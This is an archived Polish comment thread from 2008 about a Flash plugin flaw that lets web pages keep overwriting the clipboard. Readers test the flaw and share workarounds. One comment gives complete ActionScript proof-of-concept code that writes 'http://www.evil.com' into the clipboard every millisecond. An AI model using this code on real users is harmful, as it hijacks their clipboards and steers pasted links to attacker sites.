Apple Facebook Google Microsoft badania bezpieczeństwo patronat DI prawa autorskie serwisy społecznościowe smartfony

Komentarze:

comments powered by Disqus

Komentarze archiwalne:

  • ~13579BDF

    U mnie pod linuksowym Firefoksem w schowku pojawił się www.evil.com i nie chciał się usunąć. Jednakże wystarczyło zamknąć daną stronę (nie przeglądarkę) i schowek był znowu wolny :) Wygląda na to, że to jakieś while(true)setClipboard("evil.com") co mogę także zrobić w JS ale chyba tylko pod IE. Mozillowate domyślnie zabraniają skryptom zabaw ze schowkiem. Jak reszta nie wiem i nie chce mi się sprawdzać.

    Poza tym ja bym takiego adresu zapewne nie skopiował, bo X11 ma trzy schowki. CLIPBOARD można określić jako CTRL+C CTRL+V i ten by był popsuty, PRIMARY zachowujący zaznaczenie z czego zazwyczaj korzystam (np. trzeci myszy wkleja) oraz SECONDARY, który chyba w ogóle nie jest używany. To tak jako ciekawostkę podaję :)

    20-08-2008, 22:35

    Odpowiedz
    odpowiedz
  • ~jaś

    Ważniejsze jest to, że pod X11 nie da się zablokować schowka na stałę, nie da się zrobić tak aby po zamknięciu strony schowek był nadal zablokowany. A nawet nie trzeba strony zamykać wystarczy ubić złośliwy skrypt na stronie o bojętnie w jaki sposób czy to przy pomocy polecenia killall flashplugin czy jeszcze wygodniej przy pomocy takiej skryptozakładki jak zapplugins ze strony https://www.squar(...)zap.html

    21-08-2008, 00:54

    Odpowiedz
    odpowiedz
  • Termi68
    m
    Użytkownik DI Termi68 (3)

    Nawet nie musiałem zamykać strony. Usunąłem tylko z NoScript tymczasowe zezwolenia.
    "WinXP Mozilla 3.1"

    21-08-2008, 04:20

    Odpowiedz
    odpowiedz
  • ~Lukasz

    Schowek używany przez środkowy klawisz myszy nie jest obsługiwany przez ten skrypt. Ctrl+v oczywiście tak, ale kto rozsądny korzysta z ctrl+v jak ma środkowy przycisk myszy?

    21-08-2008, 07:34

    Odpowiedz
    odpowiedz
  • Kamyk
    m
    Użytkownik DI Kamyk (1884)
    [w odpowiedzi dla: ~Lukasz]

    Najpierw trzeba zakupić myszkę.

    21-08-2008, 08:13

    Odpowiedz
    odpowiedz
  • ~Dex

    No cóż nie jest to nowość, kiedyś spotkałem się ze stroną jednego z Polskich muzeów, które wrzucało do schowka tekst "kopiowanie zabronione"

    a całość nie jest raczej błędem tylko użyciem w pętli kodu:
    System.setClipboard('jestem w schowku');

    21-08-2008, 11:59

    Odpowiedz
    odpowiedz
  • ~asdds

    zawszę Operę pomijają ;(

    21-08-2008, 12:18

    Odpowiedz
    odpowiedz
  • ~koniczynek

    Na atak narażony jest nie tylko Internet Explorer, ale też uznawane za bardziej bezpieczne przeglądarki Firefox i Safari

    Co to za brednie. Na atak narażony jest plugin flash, który może być uruchomiony w dowolnej przeglądarce, nawet w Operze, o której tutaj mowy nie ma.

    21-08-2008, 14:21

    Odpowiedz
    odpowiedz
  • Jurgi
    Użytkownik DI Jurgi (1377)

    Kolejny powód, żeby nie używać wtyczki flash. Ile jeszcze takich dziur istnieje? O ilu nie wiemy, choć może już są wykorzystywane? Im więcej wszelkiego rodzaju wtyczek i dodatków, tym większe ryzyko…

    21-08-2008, 15:00

    Odpowiedz
    odpowiedz
  • ~Kod do ataku

    package test_fla
    {
    import flash.display.*;
    import flash.system.*;
    import flash.utils.*;

    dynamic public class MainTimeline extends MovieClip
    {

    public function MainTimeline()
    {
    addFrameScript(0, frame1);
    return;
    }

    function frame1()
    {
    setInterval(setClip, 1);
    return;
    }

    public function setClip()
    {
    System.setClipboard("http://www.evil.com");
    return;
    }
    }
    }

    21-08-2008, 21:18

    Odpowiedz
    odpowiedz
  • ~xmaster

    Jest błąd w materiale
    Owszem po wyświetleniu tej strony w schowku miałem adres evil.cośtam, ale wystarczyło skopiować do schowka cokolwiek innego i już zamieniało o poprzedni wpis - nawet przy otwartej karcie tgo skryptu.
    Open SuSE 11.0 Firefox - w miarę najnowszy :)

    27-08-2008, 12:15

    Odpowiedz
    odpowiedz
RSS  
RSS  
Chwilowo brak danych. Sprawdź później :)